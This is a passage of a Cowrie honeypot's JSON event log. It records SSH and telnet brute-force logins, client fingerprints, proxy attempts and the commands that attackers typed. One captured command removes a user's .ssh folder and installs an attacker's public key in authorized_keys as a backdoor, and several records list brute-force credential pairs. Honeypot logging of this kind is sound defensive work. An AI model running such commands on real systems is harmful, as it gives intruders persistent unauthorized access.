56-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:04:21.754975Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.login.success","username":"root","password":"AHdianxin@1234","message":"login attempt [root/AHdianxin@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:04:22.820430Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:04:23.387486Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:04:23.388825Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:04:23.391474Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:04:23.646916Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:04:24.171662Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T08:04:24.172396Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T08:04:24.427423Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:04:24.428342Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.session.connect","src_ip":"123.58.212.133","src_port":37446,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d975bdebb58","protocol":"ssh","message":"New connection: 123.58.212.133:37446 (1.2.3.4:22) [session: 8d975bdebb58]","sensor":"my-vps","timestamp":"2025-08-26T08:04:24.688817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:04:24.689576Z","src_ip":"123.58.212.133","session":"8d975bdebb58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:04:24.947582Z","src_ip":"123.58.212.133","session":"8d975bdebb58"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T08:04:26.021814Z","src_ip":"123.58.212.133","session":"8d975bdebb58"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:04:27.281521Z","src_ip":"123.58.212.133","session":"8d975bdebb58"}
{"eventid":"cowrie.session.connect","src_ip":"123.58.212.133","src_port":36566,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0a35fc012cb","protocol":"ssh","message":"New connection: 123.58.212.133:36566 (1.2.3.4:22) [session: e0a35fc012cb]","sensor":"my-vps","timestamp":"2025-08-26T08:04:27.539784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:04:27.540726Z","src_ip":"123.58.212.133","session":"e0a35fc012cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:04:27.798810Z","src_ip":"123.58.212.133","session":"e0a35fc012cb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:04:28.871078Z","src_ip":"123.58.212.133","session":"e0a35fc012cb"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:04:29.125841Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:04:29.130177Z","src_ip":"123.58.212.133","session":"e0a35fc012cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34650,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d9792c056c2","protocol":"ssh","message":"New connection: 212.227.235.229:34650 (1.2.3.4:22) [session: 0d9792c056c2]","sensor":"my-vps","timestamp":"2025-08-26T08:05:48.490404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:05:49.826333Z","src_ip":"212.227.235.229","session":"0d9792c056c2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:05:49.836933Z","src_ip":"212.227.235.229","session":"0d9792c056c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Lekhan@123","message":"login attempt [root/Lekhan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:05:52.942991Z","src_ip":"212.227.235.229","session":"0d9792c056c2"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:05:53.485401Z","src_ip":"212.227.235.229","session":"0d9792c056c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32443,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcde04163f0e","protocol":"ssh","message":"New connection: 212.227.125.160:32443 (1.2.3.4:22) [session: dcde04163f0e]","sensor":"my-vps","timestamp":"2025-08-26T08:06:45.044685Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:06:45.046911Z","src_ip":"212.227.125.160","session":"dcde04163f0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32741,"dst_ip":"1.2.3.4","dst_port":22,"session":"9eb654909826","protocol":"ssh","message":"New connection: 212.227.125.160:32741 (1.2.3.4:22) [session: 9eb654909826]","sensor":"my-vps","timestamp":"2025-08-26T08:06:45.156190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:06:45.156926Z","src_ip":"212.227.125.160","session":"9eb654909826"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T08:06:45.267873Z","src_ip":"212.227.125.160","session":"9eb654909826"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:06:45.602254Z","src_ip":"212.227.125.160","session":"9eb654909826"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T08:06:45.713631Z","session":"9eb654909826"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49608,"dst_ip":"1.2.3.4","dst_port":22,"session":"5017f65e0098","protocol":"ssh","message":"New connection: 217.72.205.35:49608 (1.2.3.4:22) [session: 5017f65e0098]","sensor":"my-vps","timestamp":"2025-08-26T08:06:55.621267Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:06:55.623818Z","src_ip":"217.72.205.35","session":"5017f65e0098"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:07:55.156917Z","src_ip":"212.227.125.160","session":"9eb654909826"}
{"eventid":"cowrie.session.connect","src_ip":"119.193.223.178","src_port":57993,"dst_ip":"1.2.3.4","dst_port":23,"session":"0a2b9d6ffad7","protocol":"telnet","message":"New connection: 119.193.223.178:57993 (1.2.3.4:23) [session: 0a2b9d6ffad7]","sensor":"my-vps","timestamp":"2025-08-26T08:08:27.264677Z"}
{"eventid":"cowrie.session.closed","duration":30.393861532211304,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:08:57.658433Z","src_ip":"119.193.223.178","session":"0a2b9d6ffad7"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":46738,"dst_ip":"1.2.3.4","dst_port":23,"session":"9dca95dd8ac4","protocol":"telnet","message":"New connection: 176.65.149.186:46738 (1.2.3.4:23) [session: 9dca95dd8ac4]","sensor":"my-vps","timestamp":"2025-08-26T08:09:44.850682Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:09:44.895693Z","src_ip":"176.65.149.186","session":"9dca95dd8ac4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:09:44.958885Z","src_ip":"176.65.149.186","session":"9dca95dd8ac4"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T08:09:44.960298Z","src_ip":"176.65.149.186","session":"9dca95dd8ac4"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T08:09:44.961393Z","src_ip":"176.65.149.186","session":"9dca95dd8ac4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64877,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e7117bb88bb","protocol":"ssh","message":"New connection: 213.209.150.239:64877 (1.2.3.4:22) [session: 6e7117bb88bb]","sensor":"my-vps","timestamp":"2025-08-26T08:10:02.942940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:10:02.943893Z","src_ip":"213.209.150.239","session":"6e7117bb88bb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T08:10:03.003628Z","src_ip":"213.209.150.239","session":"6e7117bb88bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:10:03.314528Z","src_ip":"213.209.150.239","session":"6e7117bb88bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":12516,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:12516","sensor":"my-vps","timestamp":"2025-08-26T08:10:03.373913Z","session":"6e7117bb88bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T08:10:03.432555Z","src_ip":"213.209.150.239","session":"6e7117bb88bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":5424,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5424","sensor":"my-vps","timestamp":"2025-08-26T08:10:03.593025Z","session":"6e7117bb88bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T08:10:03.651858Z","src_ip":"213.209.150.239","session":"6e7117bb88bb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:10:03.711416Z","src_ip":"213.209.150.239","session":"6e7117bb88bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49817,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7a5e3fc0fbe","protocol":"ssh","message":"New connection: 212.227.235.229:49817 (1.2.3.4:22) [session: e7a5e3fc0fbe]","sensor":"my-vps","timestamp":"2025-08-26T08:10:09.820592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T08:10:09.821482Z","src_ip":"212.227.235.229","session":"e7a5e3fc0fbe"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T08:10:09.945442Z","src_ip":"212.227.235.229","session":"e7a5e3fc0fbe"}
{"eventid":"cowrie.login.failed","username":"ping","password":"123456","message":"login attempt [ping/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T08:10:10.716065Z","src_ip":"212.227.235.229","session":"e7a5e3fc0fbe"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:10:11.842756Z","src_ip":"212.227.235.229","session":"e7a5e3fc0fbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52038,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb723164a3e8","protocol":"ssh","message":"New connection: 212.227.235.229:52038 (1.2.3.4:22) [session: bb723164a3e8]","sensor":"my-vps","timestamp":"2025-08-26T08:10:24.232040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:10:24.962877Z","src_ip":"212.227.235.229","session":"bb723164a3e8"}
